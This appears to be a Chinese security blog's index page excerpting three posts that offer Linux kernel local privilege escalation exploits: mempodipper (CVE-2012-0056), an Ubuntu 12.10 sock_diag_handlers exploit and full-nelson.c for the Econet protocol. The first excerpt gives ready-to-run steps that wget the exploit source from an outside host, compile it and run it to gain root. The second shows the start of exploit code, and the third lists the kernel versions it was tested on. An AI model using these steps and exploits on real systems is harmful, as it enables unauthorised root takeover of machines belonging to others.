本地提权

Linux 2.6.39 到 3.2.0 内核爆本地提权漏洞exp代码

linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。

 

重现方法:

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

cc mempodipper.c

./a.out

 

在执行完毕后运行 whoami 来看是否执行成功。

» 阅读全文

关键词: 漏洞exp , 本地提权 , linux

Ubuntu 12.10 64-Bit sock_diag_handlers本地提权Exploit

ubuntu 12.10 64-Bit sock_diag_handlers本地提权exploit。代码具有攻击性,请用于测试和研究,否则后果自负

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>

» 阅读全文

关键词: exploit , 本地提权 , ubuntu

full-nelson.c代码:Ubuntu(Linux Kernel <= 2.6.37) Econet 协议的本地提权exp代码

程序利用了 Linux Econet 协议的3个安全漏洞,可以导致本地帐号对系统进行拒绝服务或特权提升,也就是说一个普通用户可以通过运行这段程序后轻松获得 root shell

update 过的 Ubuntu 10.04 Server LTS 上测试通过:

uname -r
2.6.32-21-server

测试:

2.6.35-22-generic也通过。

代码具有攻击性,攻击他人网站自重。

» 阅读全文

关键词: 本地提权 , full-nelson.c , exp代码